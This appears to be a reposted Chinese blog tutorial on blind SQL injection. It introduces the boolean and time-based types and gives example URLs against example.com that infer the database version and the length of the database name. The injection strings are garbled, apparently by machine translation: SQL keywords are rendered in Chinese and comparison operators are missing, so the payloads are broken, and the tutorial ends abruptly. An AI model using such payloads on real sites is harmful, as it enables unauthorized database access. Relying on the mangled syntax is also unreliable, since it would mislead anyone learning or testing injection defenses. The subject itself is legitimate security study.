【漏洞挖掘】——102、Blind注入类型深入刨析,nldd注入

【漏洞挖掘】——102、Blind注入类型深入刨析基本介绍
Blind Injection(即盲注),当SQL语句执行成功或失败不会给出明确的回显信息或者只有一个提示类的信息,类似于true\\false时,此时可以考虑盲注,常见的盲注有以

基本介绍

盲注入(Blind Injection) 如果一条SQL语句的成功或失败没有提供明确的回显信息,或者只有类似于true/false的提示类型信息,此时就可以考虑盲注入。有一种常见的盲注。属于以下类型:

基于布尔的盲注

基于时间的盲注

布尔盲注

适用场景

每个SQL语句最好有成功或失败的提示结果(例如“YES”和“NO”)。

注入流程

猜测数据库版本

http://www.example.com/?id=1\’ 和left(version(),1)4–+ #YES

http://www.example.com/?id=1\’ 和left(version(),1)5–+ #NO

http://www.example.com/?id=1\’ 和left(version(),1)=5–+ #YES

该语句在这里的意思是检查版本号的第一位是否大于4、大于5或等于5。如果满足条件,则返回YES代表的页面。返回下一个数字。按顺序猜的。

猜测数据库名的长度

http://www.example.com/?id=1\’ 和长度(database())8 –+ #YES

http://www.example.com/?id=1\’ 和长度(database())9 –+ #NO

http://www.example.com/?id=1\’ 且长度(database())=9 –+ #YES

猜测数据库名的名称

#【漏洞挖掘】——102及以上相关内容来源网络对盲注类型的详细分析,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/91302.html

(0)
CSDN's avatarCSDN
上一篇 2024年6月21日 下午6:51
下一篇 2024年6月21日 下午6:51

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注